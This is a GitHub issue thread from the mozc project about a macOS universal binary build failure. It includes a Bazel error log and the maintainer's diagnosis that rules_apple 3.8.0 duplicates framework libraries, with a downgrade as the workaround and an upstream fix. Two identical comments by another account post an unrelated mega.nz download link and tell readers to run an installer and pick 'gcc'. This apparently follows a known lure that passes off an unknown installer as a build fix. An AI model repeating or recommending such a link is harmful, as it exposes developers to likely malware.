### ISSUE TITLE
Build error: [macOS] Universal binary build

### ISSUE THREAD

**Issue by hiroyuki-komatsu** [google/mozc#1023]
## Description
[macOS] Universal binary build is failed.

## Commit-id
Since 188ed0b2ad90fb002537c62bf83c63e17ecc0dfd

## Build target
Choose one of them
2. macOS build
   + https://github.com/google/mozc/blob/master/docs/build_mozc_in_osx.md

## CI build status
Whether the current CI build status is `passing` or `failure`.
https://github.com/google/mozc#build-status

Choose either of them
2. failure

## Environment
 - OS: macOS

## Build commands
Steps of command lines to reproduce your error.

1. python3 build_tools/build_qt.py --release --confirm_license --macos_cpus=x86_64,arm64
2. bazel build --config oss_macos package --macos_cpus=x86_64,arm64 -c opt

## Error logs

https://github.com/google/mozc/actions/runs/10538246849/job/29200541576

```
ERROR: /Users/runner/work/mozc/mozc/src/gui/about_dialog/BUILD.bazel:109:26: in macos_application rule //gui/about_dialog:about_dialog_macos: 
Traceback (most recent call last):
	File "/private/var/tmp/_bazel_runner/70589f76e9298332e2e2764a78cc063e/external/rules_apple~/apple/internal/macos_rules.bzl", line 397, column 41, in _macos_application_impl
		processor_result = processor.process(
	File "/private/var/tmp/_bazel_runner/70589f76e9298332e2e2764a78cc063e/external/rules_apple~/apple/internal/processor.bzl", line 759, column 38, in _process
		_bundle_post_process_and_sign(
	File "/private/var/tmp/_bazel_runner/70589f76e9298332e2e2764a78cc063e/external/rules_apple~/apple/internal/processor.bzl", line 577, column 38, in _bundle_post_process_and_sign
		_bundle_partial_outputs_files(
	File "/private/var/tmp/_bazel_runner/70[58](https://github.com/google/mozc/actions/runs/10538246849/job/29200541576#step:7:59)9f76e9298332e2e2764a78cc063e/external/rules_apple~/apple/internal/processor.bzl", line 347, column 29, in _bundle_partial_outputs_files
		fail(
Error in fail: Multiple files would be placed at "AboutDialog.app/Contents/Frameworks/QtCore" in the bundle, which is not allowed. check input file:
bazel-out/darwin_x86_64-opt-macos-x86_64-min11.0-applebin_macos-ST-0ef80d6acb6e/bin/_solib_darwin_x86_64/_U_A_A_Umain~_Urepo_Urules~qt_Umac_S_S_CQtCore_Umac___Ulib_SQtCore.framework/QtCore
ERROR: /Users/runner/work/mozc/mozc/src/gui/about_dialog/BUILD.bazel:109:26: Analysis of target '//gui/about_dialog:about_dialog_macos' failed
```

## Additional context

This issue is introduced by the update of `rules_apple` in `WORKSPACE.bazel` and `MODULE.bazel` to 3.8.0. Downgrading `rules_apple` to 3.5.1 is a workaround to address this issue. We will do it as a quick fix.

The root cause of this issue is https://github.com/bazelbuild/rules_apple/commit/66de359836e375a070a6edde29c22cc5754c5e90 to `rules_apple`. This change packages depending `.dylib` files to the target application to fix https://github.com/bazelbuild/rules_apple/issues/2472. However, this change also duplicates dynamic link libraries of frameworks and tries to duplicate universal binary dynamic link libraries multiple times.

I think updating `rules_apple` not to duplicates dynamic link libraries of frameworks is the right solution for this issue.

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by hiroyuki-komatsu** [comment]
c1e9f8b19aa5ecf51d643e3c338bc997988d7909 downgraded the rules_apple version to 3.5.1 from 3.8.0 to work around the issue.

I have also fixed the rules_apple upstream.
* https://github.com/bazelbuild/rules_apple/issues/2516
* https://github.com/bazelbuild/rules_apple/pull/2517

The versions after 3.8.0 of rules_apple will contain this fix.
